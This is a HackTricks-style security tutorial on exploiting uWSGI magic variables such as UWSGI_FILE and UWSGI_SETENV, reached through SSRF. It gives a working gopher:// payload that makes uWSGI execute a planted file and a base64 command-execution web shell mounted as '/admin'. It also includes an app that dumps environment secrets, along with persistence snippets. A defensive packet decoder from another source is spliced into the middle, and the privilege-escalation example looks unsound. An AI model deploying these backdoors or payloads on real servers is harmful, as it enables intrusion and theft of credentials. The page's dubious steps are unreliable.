WSGI Post-Exploitation Tricks


tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

WSGI Overview

The Web Server Gateway Interface (WSGI) is a specification that describes how a web server communicates with web applications, and how web applications can be chained together to process a single request. uWSGI is one of the most popular WSGI servers and is often used to serve Python web applications.

uWSGI Magic Variables Exploitation

uWSGI provides special variables called "magic variables" that can be used to configure server behaviour dynamically. These variables can be set via HTTP headers and can lead to serious security vulnerabilities if they are not properly validated.

Key Exploitable Variables

UWSGI_FILE - Arbitrary File Execution

```
uwsgi_param UWSGI_FILE /path/to/python/file.py;
```

This variable allows loading and executing arbitrary Python files as WSGI applications. If an attacker can control this variable, they can achieve Remote Code Execution (RCE).

UWSGI_SCRIPT - Script Loading

```
uwsgi_param UWSGI_SCRIPT module.path:callable;
uwsgi_param SCRIPT_NAME /endpoint;
```

Loads the specified script as a new application. Combined with file upload or file write capabilities, this can lead to RCE.

UWSGI_MODULE and UWSGI_CALLABLE - Dynamic Module Loading

```
uwsgi_param UWSGI_MODULE malicious.module;
uwsgi_param UWSGI_CALLABLE evil_function;
uwsgi_param SCRIPT_NAME /backdoor;
```

These variables allow loading arbitrary Python modules and calling specific functions inside them.

UWSGI_SETENV - Environment Variable Control

```
uwsgi_param UWSGI_SETENV DJANGO_SETTINGS_MODULE=malicious.settings;
```

Can be used to modify environment variables, thereby influencing application behaviour or loading malicious configuration.

UWSGI_PYHOME - Python Environment Manipulation

```
uwsgi_param UWSGI_PYHOME /path/to/malicious/venv;
```

Changes the Python virtual environment, which can cause malicious packages or a different Python interpreter to be loaded.

UWSGI_CHDIR - Directory Traversal

```
uwsgi_param UWSGI_CHDIR /etc/;
```

Changes the working directory before the request is processed, which can be abused for path traversal attacks.

SSRF + Gopher

Attack Path

When uWSGI is reachable through SSRF (Server-Side Request Forgery), attackers can interact with the internal uWSGI socket to abuse the magic variables. This is especially dangerous when:

  1. The application has SSRF vulnerabilities
  2. uWSGI runs on an internal port/socket
  3. The application does not properly validate the magic variables

uWSGI is reachable through SSRF because the uwsgi.ini config file contains: socket = 127.0.0.1:5000, which makes it reachable from the web application via SSRF.

Exploitation Example

Step 1: Create the Malicious Payload

First, inject Python code into a file reachable by the server (writing a file onto the server; the file extension does not matter):

```python
# Payload injected into a JSON profile file
import os
os.system("/readflag > /app/profiles/result.json")
```

Step 2: Craft the uWSGI Protocol Request

Use the Gopher protocol to send raw uWSGI packets:

```
gopher://127.0.0.1:5000/_%00%D2%00%00%0F%00SERVER_PROTOCOL%08%00HTTP/1.1%0E%00REQUEST_METHOD%03%00GET%09%00PATH_INFO%01%00/%0B%00REQUEST_URI%01%00/%0C%00QUERY_STRING%00%00%0B%00SERVER_NAME%00%00%09%00HTTP_HOST%0E%00127.0.0.1%3A5000%0A%00UWSGI_FILE%1D%00/app/profiles/malicious.json%0B%00SCRIPT_NAME%10%00/malicious.json
```

This payload:

  • Connects to uWSGI on port 5000
  • Sets UWSGI_FILE to point at the malicious file
  • Forces uWSGI to load and execute the Python code

uWSGI Protocol Structure

The uWSGI protocol uses a binary structure in which:

  • Variables are encoded in a length-prefixed string format
  • Each variable consists of: [name_length][name][value_length][value]
  • The packet begins with a header that carries the total size of the body
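As an added example (not code from the original page), here is a decoder a defender can run over traffic captured on the uWSGI socket: it parses the 4-byte header (modifier1, 16-bit little-endian data size, modifier2) and the length-prefixed variables, rejects packets whose declared lengths do not match the bytes present, and flags any of the magic variables listed above. The encoder and the sample packet are constructed here only to produce test input.

```python
import struct

# Magic variables listed on this page; a request carrying one of them from an
# untrusted source deserves an alert (assumption: the front-end proxy never
# forwards client-controlled values into these parameters).
MAGIC_VARS = {"UWSGI_FILE", "UWSGI_SCRIPT", "UWSGI_MODULE", "UWSGI_CALLABLE",
              "UWSGI_SETENV", "UWSGI_PYHOME", "UWSGI_CHDIR"}


def parse_uwsgi_packet(data: bytes) -> dict:
    # Header: modifier1 (u8), datasize (u16 little-endian), modifier2 (u8).
    # Body: repeated [name_len u16 LE][name][value_len u16 LE][value].
    if len(data) < 4:
        raise ValueError("packet shorter than the 4-byte uwsgi header")
    modifier1, datasize, modifier2 = struct.unpack("<BHB", data[:4])
    body = data[4:4 + datasize]
    if len(body) != datasize:
        raise ValueError(f"header declares {datasize} body bytes, got {len(body)}")
    variables, pos = {}, 0
    while pos < datasize:
        fields = []
        for _ in range(2):  # name, then value
            if pos + 2 > datasize:
                raise ValueError("truncated length field")
            (length,) = struct.unpack_from("<H", body, pos)
            pos += 2
            if pos + length > datasize:
                raise ValueError("length field runs past the end of the packet")
            fields.append(body[pos:pos + length].decode("latin-1"))
            pos += length
        variables[fields[0]] = fields[1]
    return {"modifier1": modifier1, "modifier2": modifier2, "vars": variables}


def flag_magic_vars(variables: dict) -> list:
    """Names of magic variables present in a decoded request, for alerting."""
    return sorted(name for name in variables if name in MAGIC_VARS)


def build_uwsgi_packet(variables: dict) -> bytes:
    """Encode variables in the same wire format; used here to build samples."""
    body = b""
    for name, value in variables.items():
        n, v = name.encode("latin-1"), value.encode("latin-1")
        body += struct.pack("<H", len(n)) + n + struct.pack("<H", len(v)) + v
    return struct.pack("<BHB", 0, len(body), 0) + body


# Constructed sample that smuggles UWSGI_FILE (same path as the page's payload).
SUSPICIOUS = build_uwsgi_packet({"REQUEST_METHOD": "GET", "PATH_INFO": "/",
                                 "UWSGI_FILE": "/app/profiles/malicious.json",
                                 "SCRIPT_NAME": "/malicious.json"})
```

Running `flag_magic_vars(parse_uwsgi_packet(SUSPICIOUS)["vars"])` returns `["UWSGI_FILE"]`, while a packet with only REQUEST_METHOD and PATH_INFO returns an empty list.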

Post-Exploitation Techniques

1. Persistent Backdoors

File-based Backdoor

```python
# backdoor.py
import subprocess
import base64

def application(environ, start_response):
    # Command arrives base64-encoded in the X-Cmd request header
    cmd = environ.get('HTTP_X_CMD', '')
    if cmd:
        result = subprocess.run(base64.b64decode(cmd), shell=True, capture_output=True, text=True)
        response = f"STDOUT: {result.stdout}\nSTDERR: {result.stderr}"
    else:
        response = "Backdoor active"

    start_response('200 OK', [('Content-Type', 'text/plain')])
    return [response.encode()]
```

Then use UWSGI_FILE to load this backdoor:

```
uwsgi_param UWSGI_FILE /tmp/backdoor.py;
uwsgi_param SCRIPT_NAME /admin;
```

Environment-based Persistence

```
uwsgi_param UWSGI_SETENV PYTHONPATH=/tmp/malicious:/usr/lib/python3.8/site-packages;
```

2. Information Disclosure

Environment Variable Dumping

```python
# env_dump.py
import os
import json

def application(environ, start_response):
    # Dump both the process environment and the per-request WSGI environ
    env_data = {
        'os_environ': dict(os.environ),
        'wsgi_environ': dict(environ)
    }

    start_response('200 OK', [('Content-Type', 'application/json')])
    return [json.dumps(env_data, indent=2, default=str).encode()]
```

File System Access

Use UWSGI_CHDIR together with file serving to reach sensitive files:

```
uwsgi_param UWSGI_CHDIR /etc/;
uwsgi_param UWSGI_FILE /app/file_server.py;
```

3. Privilege Escalation

Socket Manipulation

If uWSGI runs with elevated privileges, attackers can modify the socket permissions:

```
uwsgi_param UWSGI_CHDIR /tmp;
uwsgi_param UWSGI_SETENV UWSGI_SOCKET_OWNER=www-data;
```

Configuration Override

```python
# malicious_config.py
import os

# Override uWSGI configuration.
# uWSGI maps UWSGI_<OPTION> environment variables to options when it starts,
# so these values only take effect for uWSGI processes started with this environment.
os.environ['UWSGI_MASTER'] = '1'
os.environ['UWSGI_PROCESSES'] = '1'
os.environ['UWSGI_CHEAPER'] = '1'
```
